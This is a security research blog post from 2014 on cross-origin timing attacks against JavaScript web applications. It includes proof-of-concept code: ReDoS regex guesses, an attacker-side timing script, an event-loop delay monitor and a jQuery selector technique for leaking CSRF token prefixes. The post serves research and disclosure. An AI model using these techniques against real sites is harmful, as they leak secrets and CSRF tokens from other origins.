Saturday, May 31, 2014

[Matryoshka] - Web Application Timing Attacks (or.. Timing Attacks against JavaScript Applications in Browsers)

Following up on the previous blog post about the wrapping overflow leak on frames, this one also comes from Matryoshka, the presentation I gave at HackPra All Stars 2013 in Hamburg during AppSec Europe 2013.

The subject today is web application timing attacks: a couple of techniques for attacking another website by measuring how long its code takes to run. Timing attacks are very popular in cryptography, where they usually target remote services or local applications. Recently they've become a bit popular again, and are being used to attack browser security features.


Today the subject I want to discuss is not attacking the browser or the operating system, but rather other websites. Specifically, I want to show you how to perform timing attacks cross-domain whenever a value you control is used by another web application.


The impact of successfully exploiting this vulnerability varies depending on the application being attacked. To be clear, what we are attacking are JavaScript-heavy applications that handle data somehow controlled by another website, such as cookies, the URL, the referrer, postMessage, etc.


Overall though, the attack itself isn't new, and applying it to browsers is probably predictable... but when it's discussed it's frequently dismissed as unexploitable or unrealistic. Now, before I get your hopes up: while I think it's certainly exploitable and realistic, it isn't as straightforward as other attacks.


We know that you can obviously tell whether your own code runs faster or slower, but, as some of you might want to correct me, that shouldn't matter. Why? Well, because of the Same Origin Policy. In case you are not aware, the Same Origin Policy dictates that https://puppies.com can't interact with https://kittens.com. It defines a very specific subset of APIs where communication is safe (like, say, navigation, postMessage, or CORS).

The general wisdom says that to be vulnerable to information leak attacks you need to opt in: you have to be doing something stupid for stupid things to happen to you. For example, say you have code that runs a regular expression on some data, like:

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        // reply to the sender's origin (the second argument must be an origin)
        e.source.postMessage('got a match!', e.origin);
    }
};

Well, of course it will be possible to leak information. Try it out (the original post embeds a live demo) with guesses like:

  • The secret is 0.0
  • The secret is 0.1
  • The secret is 0.2
  • ...
  • The secret is 0.9


You can claim this code is vulnerable and no one would tell you otherwise. "You shouldn't be writing code like this (tm)".

Now, what about this?

onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
    e.source.postMessage('finished', e.origin);
};

Well, now it's tricky, right? In theory, this script isn't leaking any information to the parent page (except, of course, how long it took to run the regular expression). Depending on who you ask, they will tell you this is a vulnerability... or not.

Now, it clearly is vulnerable, but let's figure out exactly why. There is one piece of information that is leaked: how long it took to run the regular expression. We control the regular expression, so we can run any regular expression we want and learn how long it took to run.

If you are familiar with regular expressions, you might be familiar with the term "ReDoS" (regular expression denial of service): crafted patterns that make the regex engine run in exponential time, denying service to the runtime. You can read more about it here. The general premise is that you can make a regular expression take forever if you want to.

So, with that information, we can perform the same attack as before, but this time we infer whether we had the right match simply by checking whether it took over N seconds to respond to our message, or whether it returned immediately.
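
As a rough sketch of the attacker side (the names and the threshold are mine, not from the post), the embedding page could time how long each guess takes to get the 'finished' reply, and treat slow guesses as matches:

// Attacker page: frames the victim and times each ReDoS-amplified guess.
var victim = document.getElementById('victim').contentWindow;

function timeGuess(regexp) {
    return new Promise(function (resolve) {
        var start = performance.now();
        window.addEventListener('message', function handler(e) {
            if (e.data === 'finished') {
                window.removeEventListener('message', handler);
                resolve(performance.now() - start);
            }
        });
        victim.postMessage(regexp, '*');
    });
}

// A guess that matches triggers the exponential suffix and takes much longer.
timeGuess("The secret is 0.1[0-9.]+(.{0,100}){12}XXX").then(function (ms) {
    console.log(ms > 2000 ? 'probably a match!' : 'no match');
});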

Let's give it a try:


  • The secret is 0.0[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.1[0-9.]+(.{0,100}){12}XXX
  • The secret is 0.2[0-9.]+(.{0,100}){12}XXX
  • ...
  • The secret is 0.9[0-9.]+(.{0,100}){12}XXX



Did you notice that the right answer took longer than the others?

If you are an average security curmudgeon you will still say that the fault lies with the vulnerable site, since it's opting in to leaking how long it took to run the regular expression. All developers are supposed to take care of these types of problems, so why not JavaScript developers?

Alright then, let's fix up the code:
onmessage = function(e) {
    if (document.body.innerHTML.match(new RegExp(e.data))) {
        console.log('got a match');
    }
}

That clearly has no feedback loop back to the parent page. Can we still attack it?

Well, now it gets tricky. When I told you that the Same Origin Policy isolates kittens.com from puppies.com, I wasn't being totally honest. The JavaScript code from both kittens.com and puppies.com runs in the same thread. That is, if you have three iframes, one pointing to puppies.com, one to kittens.com, and one to snakes.com, then all of them run in the same thread.

Said another way, if snakes.com suddenly decides to run an infinite loop, neither puppies.com nor kittens.com will be able to run any JavaScript code. Don't believe me? Give it a try!
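
The demo boils down to something like this sketch (the 5-second loop and the counters are just stand-ins for the live demo in the original post):

// In the snakes.com frame: hog the shared thread for five seconds.
function loopTheSnakes() {
    var end = Date.now() + 5000;
    while (Date.now() < end) { /* spin, blocking every same-thread frame */ }
}

// In the puppies.com and kittens.com frames: a counter that visibly freezes
// whenever the snakes frame is spinning.
var count = 0;
setInterval(function () {
    document.body.textContent = 'counter: ' + (++count);
}, 100);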





Did you notice that when you looped the "snakes", the counters in the other two iframes stopped? That's because the snakes, the puppies, and the kittens all run in the same thread, and if one script keeps the thread busy, all the other scripts are paused.

Now, with that piece of information, a whole new world opens up to us. We don't need the other page to surrender any information to us; simply by running in the same thread, we can guess how long its code takes to run!

One way to attack this is to ask the browser to run a specific piece of code every millisecond; whenever our code doesn't run on time, that means some other code is keeping the interpreter busy. We keep track of these delays, and from them we learn how long the other code took to run.
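
A minimal sketch of such a monitor (the 1ms interval and the 5ms threshold are arbitrary choices of mine, and note that browsers clamp nested timeouts to roughly 4ms):

// Schedule ourselves every millisecond and record how late we actually fire.
// A large gap means some other same-thread code (e.g. the victim frame) was busy.
var gaps = [];
var last = performance.now();
(function tick() {
    var now = performance.now();
    if (now - last > 5) {      // we were blocked for more than ~5ms
        gaps.push(now - last); // remember how long the thread was busy
    }
    last = now;
    setTimeout(tick, 1);
})();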

Alright, but you might feel a bit disappointed, since it's really not common to have code that runs regular expressions on arbitrary content... so this attack is kind of lame.

Well, not really. Fortunately, there are plenty of web applications that will run all sorts of interesting code for us. When I described the attack to Stefano Di Paola (the developer of DOMinator), he told me that he had always wanted to figure out what you could do with code that does jQuery(location.hash). This used to be an XSS, but then jQuery fixed it, so no more XSS; now, if the string starts with a '#', it is forced to be interpreted as a CSS selector.

He said that perhaps jQuery could leak timing information based on how long it took to run a specific selector over the page. I told him that was a great idea and started looking into it. It turns out there is a "contains" selector in jQuery that will essentially look at all the text content in the page and try to figure out which nodes "contain" the given text.

It essentially finds a node, serializes its text contents, and then searches for the given value inside it. In a nutshell, it does:

haystack.indexOf(needle);
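
For reference, Sizzle's ":contains" pseudo-selector boils down to roughly this per-element check (a simplified sketch of the jQuery/Sizzle source, not a verbatim copy):

// Simplified sketch of what Sizzle's :contains does for each candidate element.
function containsPseudo(elem, text) {
    return (elem.textContent || elem.innerText || '').indexOf(text) > -1;
}

// So navigating a frame that runs jQuery(location.hash) to a URL ending in
// something like #main:contains('The secret is 0.1') makes the victim do the
// haystack.indexOf(needle) work for us.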

Which is interesting, but it doesn't have the ReDoS vector we had with regular expressions. Figuring out whether there was a match is significantly more complicated: we need to know whether searching the "haystack" found something (or not), which sounds, well... complicated.

Can we get such granularity? Is it possible to detect the difference between "aaaa".indexOf("b") and "aaaa".indexOf("a")? There's clearly a running-time difference, but it is so small that we might not be able to measure it.

There is another, even cooler selector: the "string prefix" (attribute starts-with) selector. Say the page has a hidden anti-CSRF field like:

<input type="hidden" name="csrftoken" value="SOME_SECRET_TOKEN">

You can match its first character with:
input[name=csrftoken][value^=X]
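
If such prefix matches turn out to be measurable at all (which is the question the rest of this post tries to answer), the extraction loop would conceptually look like this sketch (every name here, including measureSelector, is hypothetical):

// Conceptual sketch: recover a token one character at a time by timing
// how long the victim takes to evaluate each candidate prefix selector.
var alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789';
var known = '';

function nextCharacter() {
    var timings = alphabet.split('').map(function (c) {
        var selector = 'input[name=csrftoken][value^="' + known + c + '"]';
        // Make the victim frame evaluate `selector` (e.g. via location.hash)
        // and time it with the event-loop monitor shown earlier.
        return { c: c, time: measureSelector(selector) }; // measureSelector: hypothetical
    });
    timings.sort(function (a, b) { return b.time - a.time; });
    known += timings[0].c; // the slowest candidate is (probably) the right one
}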

But again, this is even more difficult than the indexOf() attack we were doing earlier. The question now is: can we detect string comparisons? Can we get enough accuracy out of performance.now() to know whether a string comparison succeeded?

To make the question clearer.. can we measure in JavaScript the difference between "wrong" == "right" and "right" == "right"?

In theory, it should be faster to compare "wrong" to "right", because the runtime can stop the comparison at the first character, while to be sure that "right" is equal to "right" it needs to compare every character in the string.

This should be easy to test. In the following iframe we make a quick experiment and measure:

  • Time taken to compare "aaaa.....a" (200,000 characters) to "foobar"
  • Time taken to compare "aaaa.....a" to "aaaa.....a"
We make the comparison 100 times to make the timing difference more explicit.
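
Here is a stripped-down version of that experiment (my own reconstruction, using a 200,000-character string and 100 repetitions as above):

// Build two long strings with identical content but different string objects.
var longA = new Array(200001).join('a');   // 200k 'a's
var longB = new Array(200001).join('a');

var sink = 0;  // accumulate results so the comparisons aren't optimized away
var start = performance.now();
for (var i = 0; i < 100; i++) { sink += (longA == 'foobar'); }  // different lengths
var falseTime = performance.now() - start;

start = performance.now();
for (var i = 0; i < 100; i++) { sink += (longA == longB); }     // char-by-char
var trueTime = performance.now() - start;

console.log('aaa..a == foobar :', falseTime.toFixed(1) + 'ms');
console.log('aaa..a == aaa..a :', trueTime.toFixed(1) + 'ms');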

Unless something's gone totally wrong, you should see something like:
aaa..a == foobar : 0ms
aaa..a == aaa..a : 60ms
These strange-looking results mean, mostly, that comparing two identical long strings takes significantly more time than comparing two obviously different strings. The "obviously", as we will learn, is the tricky part.

What the JavaScript runtimes do is first try to take a shortcut: if the lengths are different, they return false immediately. If the lengths are the same, they compare char by char, and as soon as they find a character that doesn't match, they return false.
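
Roughly, and ignoring engine-specific fast paths (interned strings, identical object pointers, etc.), the comparison behaves like this sketch:

// Simplified model of string equality inside the runtime.
function stringEquals(a, b) {
    if (a.length !== b.length) return false;            // cheap shortcut: different lengths
    for (var i = 0; i < a.length; i++) {
        if (a.charAt(i) !== b.charAt(i)) return false;   // bail at the first mismatch
    }
    return true;                                         // a "true" comparison touches every character
}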

But is it significant? And if so, how significant is it? To try and answer that question I ran several experiments. For instance, with just 18 characters, a "false" comparison is 2 to 10 times faster than a "true" comparison. That means "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" runs 2 to 10 times slower than "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyyy". To be able to detect that, however, we need a lot of comparisons and a lot of samples to reduce noise. In this graph you can see how many thousands of iterations you need to "stabilize" the measurement.

What that graph shows is that after 120,000 iterations (that is, 120,000 comparisons) the difference between "xxxxxxxxxxxxxxxxxx" == "yyyyyyyyyyyyyyyyyy" and "xxxxxxxxxxxxxxxxxx" == "xxxxxxxxxxxxxxxxxx" is stable: the true comparison is about 6 times slower. And, to be clear, that is with all 18 characters being different, which means that to notice the 6x difference you would need to brute force all 18 characters at once. Even in the most optimistic scenario, bruteforcing 18 characters is way out of the question.

If you try to repeat the experiment with just 2 characters, the results are significantly different (note that this graph rounds results to the nearest integer). You won't be able to notice any difference at all: the line is flat up to a million iterations. That means that comparing "aa" to "bb" a million times takes about the same amount of time as comparing "aa" to "aa" (not as impressive as our 6x!).

But we don't always need impressive differences to be able to make a decision (see this graph without the rounding). With just two characters, the true comparison usually runs in exactly the same time, sometimes a tiny bit faster, but often slightly slower. In essence, it seems to take about 1.02 times as long as a false comparison.

Now, the fact that this graph looks so messy means our exploit won't be as reliable and will require significantly more samples to detect any difference. What we have in our hands is a probabilistic attack.

To exploit this, we will need to perform the attack a couple hundred, a couple thousand, or a couple million times (this actually depends on the machine: a slow machine shows larger differences but more noise, while a fast machine shows smaller differences but lets us take more accurate measurements).

With the samples we either average the results, take the mean of means (which needs a lot of samples), run a chi-squared test if we knew the variance, or run a Student's t-test if we can assume a normal distribution (JavaScript's garbage collector skews things a bit).
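
For instance, a mean-of-means aggregation could look like this sketch (the group size is an arbitrary choice of mine):

// Split the timing samples into groups, average each group, then average the
// group means. This dampens outliers such as garbage-collection pauses.
function meanOfMeans(samples, groupSize) {
    var means = [];
    for (var i = 0; i + groupSize <= samples.length; i += groupSize) {
        var sum = 0;
        for (var j = i; j < i + groupSize; j++) sum += samples[j];
        means.push(sum / groupSize);
    }
    return means.reduce(function (a, b) { return a + b; }, 0) / means.length;
}

// Usage: compare the aggregate timing of two candidate guesses, e.g.
// meanOfMeans(samplesForGuessA, 100) > meanOfMeans(samplesForGuessB, 100)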


At the end of the day, I ended up creating my own test, and was able to brute force a string in a different origin via code that does:

if (SECRET == userSupplied) {
   // do nothing
}

Here are some results on string comparison on Chrome:
  • It is possible to bruteforce an 18-digit number in about 3 minutes on most machines.
    • Without the timing attack you would need to perform about 5 quadrillion comparisons per second; with the timing attack you only need about 1 million comparisons in total (a rough sanity check of these numbers follows this list).
  • It is possible to reliably extract a 9-character alphanumeric string in about 10 minutes.
    • This differs from the numeric case because here the alphabet has 37 characters, while with numbers it's just 10.
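
As a rough sanity check of those numbers (my own back-of-the-envelope arithmetic, not from the original experiments):

// Blind brute force: all 18-digit values in 3 minutes.
var blindRate = Math.pow(10, 18) / (3 * 60);  // ≈ 5.6e15 guesses per second
// Timing attack: guess digit by digit, 10 candidates per digit, with a few
// thousand timing samples per candidate to beat the noise.
var timingComparisons = 18 * 10 * 5000;       // ≈ 1 million comparisons total
console.log(blindRate, timingComparisons);
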
If you are interested in playing around with it, and you have patience (a lot of patience!), check this and this. They will literally take 5-10 minutes to run, and they simply try to order 7 strings according to the time they took to compare. Both of them run about a million string comparisons using window.postMessage as the input, so it takes a while.

If you have even more patience, you can run this, which will try different combinations of iterations/samples to figure out which works best (slow machines work better with fewer iterations and more samples; faster machines run best with more iterations and fewer samples).

So, summary!
  • Timing attacks are easy thanks to JavaScript's single-threadedness. That might change with things like process isolation, but it will continue to be possible for the time being.
  • String comparison can be measured and attacked, but it's probabilistic and really slow with the existing attacks.
Let me know if you can improve the attack (if you can get it under 1 minute for an 18-digit number, you are my hero!), find a problem in the sampling/data, or manage to generalize the ReDoS exploit to string comparison / indexOf operations :)

Another attack that might be worth discussing relies on the fact that strings from different origins are stored in the same hash table. This means that if we were able to distinguish a hash table miss from a hash table hit by timing, we could read strings cross-origin.

I spent a lot of time trying to make that work, but it didn't work out. If you can do it, let me know as well :)

Thanks for reading!